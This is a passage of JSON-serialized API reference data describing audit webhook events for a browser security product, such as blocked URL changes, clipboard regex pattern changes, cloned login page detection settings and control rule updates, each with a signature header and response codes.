configuration."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"blocked-urls-added-event","name":"Blocked URLs added","isWebhook":true,"pointer":"/paths/blocked-urls-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Blocked URLs added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of URLs has been added to the URL blocking configuration."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/blocked-urls-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_646"}},"schemaId":"schema_646","pointer":"/paths/blocked-urls-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"blocked-urls-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_646"}},"responseCodes":["2XX"],"pointer":"blocked-urls-added","href":"audit/blocked-urls-added-event","openApiOperationId":"blocked-urls-added-event","summary":"Blocked URLs added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_646","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_646"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/blocked-urls-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/blocked-urls-added-event"}],"panels":[]}]},"httpPath":"blocked-urls-added"},{"label":"Blocked URLs removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/blocked-urls-removed-event","routeSlug":"/webhooks-v1/audit/blocked-urls-removed-event","metadata":{"seo":{"title":"Blocked URLs removed","description":"A set of URLs has been removed from the URL blocking configuration."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"blocked-urls-removed-event","name":"Blocked URLs removed","isWebhook":true,"pointer":"/paths/blocked-urls-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Blocked URLs removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of URLs has been removed from the URL blocking configuration."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/blocked-urls-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_647"}},"schemaId":"schema_647","pointer":"/paths/blocked-urls-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"blocked-urls-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_647"}},"responseCodes":["2XX"],"pointer":"blocked-urls-removed","href":"audit/blocked-urls-removed-event","openApiOperationId":"blocked-urls-removed-event","summary":"Blocked URLs removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_647","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_647"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/blocked-urls-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/blocked-urls-removed-event"}],"panels":[]}]},"httpPath":"blocked-urls-removed"},{"label":"Blocked URLs URL schema obfuscation toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/blocked-urls-url-schema-obfuscation-toggled-event","routeSlug":"/webhooks-v1/audit/blocked-urls-url-schema-obfuscation-toggled-event","metadata":{"seo":{"title":"Blocked URLs URL schema obfuscation toggled","description":"The URL schema obfuscation setting for blocked URLs has been toggled."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"blocked-urls-url-schema-obfuscation-toggled-event","name":"Blocked URLs URL schema obfuscation toggled","isWebhook":true,"pointer":"/paths/blocked-urls-url-schema-obfuscation-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Blocked URLs URL schema obfuscation toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The URL schema obfuscation setting for blocked URLs has been toggled."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/blocked-urls-url-schema-obfuscation-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_648"}},"schemaId":"schema_648","pointer":"/paths/blocked-urls-url-schema-obfuscation-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"blocked-urls-url-schema-obfuscation-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_648"}},"responseCodes":["2XX"],"pointer":"blocked-urls-url-schema-obfuscation-toggled","href":"audit/blocked-urls-url-schema-obfuscation-toggled-event","openApiOperationId":"blocked-urls-url-schema-obfuscation-toggled-event","summary":"Blocked URLs URL schema obfuscation toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_648","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_648"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/blocked-urls-url-schema-obfuscation-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/blocked-urls-url-schema-obfuscation-toggled-event"}],"panels":[]}]},"httpPath":"blocked-urls-url-schema-obfuscation-toggled"},{"label":"Browser extension enumeration toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/browser-extension-enumeration-toggled-event","routeSlug":"/webhooks-v1/audit/browser-extension-enumeration-toggled-event","metadata":{"seo":{"title":"Browser extension enumeration toggled","description":"An admin user has enabled or disabled browser extension enumeration."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"browser-extension-enumeration-toggled-event","name":"Browser extension enumeration toggled","isWebhook":true,"pointer":"/paths/browser-extension-enumeration-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Browser extension enumeration toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled browser extension enumeration."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/browser-extension-enumeration-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_649"}},"schemaId":"schema_649","pointer":"/paths/browser-extension-enumeration-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"browser-extension-enumeration-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_649"}},"responseCodes":["2XX"],"pointer":"browser-extension-enumeration-toggled","href":"audit/browser-extension-enumeration-toggled-event","openApiOperationId":"browser-extension-enumeration-toggled-event","summary":"Browser extension enumeration toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_649","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_649"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/browser-extension-enumeration-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/browser-extension-enumeration-toggled-event"}],"panels":[]}]},"httpPath":"browser-extension-enumeration-toggled"},{"label":"Clipboard custom regex pattern added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/clipboard-custom-regex-pattern-added-event","routeSlug":"/webhooks-v1/audit/clipboard-custom-regex-pattern-added-event","metadata":{"seo":{"title":"Clipboard custom regex pattern added","description":"An admin user has added a new clipboard custom regex pattern."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"clipboard-custom-regex-pattern-added-event","name":"Clipboard custom regex pattern added","isWebhook":true,"pointer":"/paths/clipboard-custom-regex-pattern-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Clipboard custom regex pattern added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added a new clipboard custom regex pattern."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/clipboard-custom-regex-pattern-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_650"}},"schemaId":"schema_650","pointer":"/paths/clipboard-custom-regex-pattern-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"clipboard-custom-regex-pattern-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_650"}},"responseCodes":["2XX"],"pointer":"clipboard-custom-regex-pattern-added","href":"audit/clipboard-custom-regex-pattern-added-event","openApiOperationId":"clipboard-custom-regex-pattern-added-event","summary":"Clipboard custom regex pattern added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_650","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_650"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/clipboard-custom-regex-pattern-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/clipboard-custom-regex-pattern-added-event"}],"panels":[]}]},"httpPath":"clipboard-custom-regex-pattern-added"},{"label":"Clipboard blocking regex pattern removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/clipboard-blocking-regex-pattern-removed-event","routeSlug":"/webhooks-v1/audit/clipboard-blocking-regex-pattern-removed-event","metadata":{"seo":{"title":"Clipboard blocking regex pattern removed","description":"An admin user has removed a clipboard blocking regex pattern."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"clipboard-blocking-regex-pattern-removed-event","name":"Clipboard blocking regex pattern removed","isWebhook":true,"pointer":"/paths/clipboard-custom-regex-pattern-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Clipboard blocking regex pattern removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed a clipboard blocking regex pattern."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/clipboard-custom-regex-pattern-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_651"}},"schemaId":"schema_651","pointer":"/paths/clipboard-custom-regex-pattern-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"clipboard-custom-regex-pattern-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_651"}},"responseCodes":["2XX"],"pointer":"clipboard-custom-regex-pattern-removed","href":"audit/clipboard-blocking-regex-pattern-removed-event","openApiOperationId":"clipboard-blocking-regex-pattern-removed-event","summary":"Clipboard blocking regex pattern removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_651","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_651"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/clipboard-custom-regex-pattern-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/clipboard-blocking-regex-pattern-removed-event"}],"panels":[]}]},"httpPath":"clipboard-custom-regex-pattern-removed"},{"label":"Cloned login page detection ignored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/cloned-login-page-detection-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/cloned-login-page-detection-ignored-domains-added-event","metadata":{"seo":{"title":"Cloned login page detection ignored domains added","description":"A set of domains have been added to the list of ignored domains for the Cloned login page detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"cloned-login-page-detection-ignored-domains-added-event","name":"Cloned login page detection ignored domains added","isWebhook":true,"pointer":"/paths/cloned-login-page-detection-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Cloned login page detection ignored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the Cloned login page detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/cloned-login-page-detection-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_652"}},"schemaId":"schema_652","pointer":"/paths/cloned-login-page-detection-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"cloned-login-page-detection-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_652"}},"responseCodes":["2XX"],"pointer":"cloned-login-page-detection-ignored-domains-added","href":"audit/cloned-login-page-detection-ignored-domains-added-event","openApiOperationId":"cloned-login-page-detection-ignored-domains-added-event","summary":"Cloned login page detection ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_652","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_652"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/cloned-login-page-detection-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/cloned-login-page-detection-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"cloned-login-page-detection-ignored-domains-added"},{"label":"Cloned login page detection ignored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/cloned-login-page-detection-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/cloned-login-page-detection-ignored-domains-removed-event","metadata":{"seo":{"title":"Cloned login page detection ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the Cloned login page detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"cloned-login-page-detection-ignored-domains-removed-event","name":"Cloned login page detection ignored domains removed","isWebhook":true,"pointer":"/paths/cloned-login-page-detection-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Cloned login page detection ignored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the Cloned login page detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/cloned-login-page-detection-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_653"}},"schemaId":"schema_653","pointer":"/paths/cloned-login-page-detection-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"cloned-login-page-detection-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_653"}},"responseCodes":["2XX"],"pointer":"cloned-login-page-detection-ignored-domains-removed","href":"audit/cloned-login-page-detection-ignored-domains-removed-event","openApiOperationId":"cloned-login-page-detection-ignored-domains-removed-event","summary":"Cloned login page detection ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_653","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_653"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/cloned-login-page-detection-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/cloned-login-page-detection-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"cloned-login-page-detection-ignored-domains-removed"},{"label":"Control rule added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/control-rule-added-event","routeSlug":"/webhooks-v1/audit/control-rule-added-event","metadata":{"seo":{"title":"Control rule added","description":"An admin user has added a new control rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"control-rule-added-event","name":"Control rule added","isWebhook":true,"pointer":"/paths/control-rule-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Control rule added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added a new control rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/control-rule-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_654"}},"schemaId":"schema_654","pointer":"/paths/control-rule-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"control-rule-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_654"}},"responseCodes":["2XX"],"pointer":"control-rule-added","href":"audit/control-rule-added-event","openApiOperationId":"control-rule-added-event","summary":"Control rule added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_654","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_654"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/control-rule-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/control-rule-added-event"}],"panels":[]}]},"httpPath":"control-rule-added"},{"label":"Control rule updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/control-rule-updated-event","routeSlug":"/webhooks-v1/audit/control-rule-updated-event","metadata":{"seo":{"title":"Control rule updated","description":"An admin user has updated a control rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"control-rule-updated-event","name":"Control rule updated","isWebhook":true,"pointer":"/paths/control-rule-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Control rule updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated a control rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/control-rule-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_655"}},"schemaId":"schema_655","pointer":"/paths/control-rule-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"control-rule-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_655"}},"responseCodes":["2XX"],"pointer":"control-rule-updated","href":"audit/control-rule-updated-event","openApiOperationId":"control-rule-updated-event","summary":"Control rule updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_655","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_655"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/control-rule-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/control-rule-updated-event"}],"panels":[]}]},"httpPath":"control-rule-updated"},{"label":"Control rule 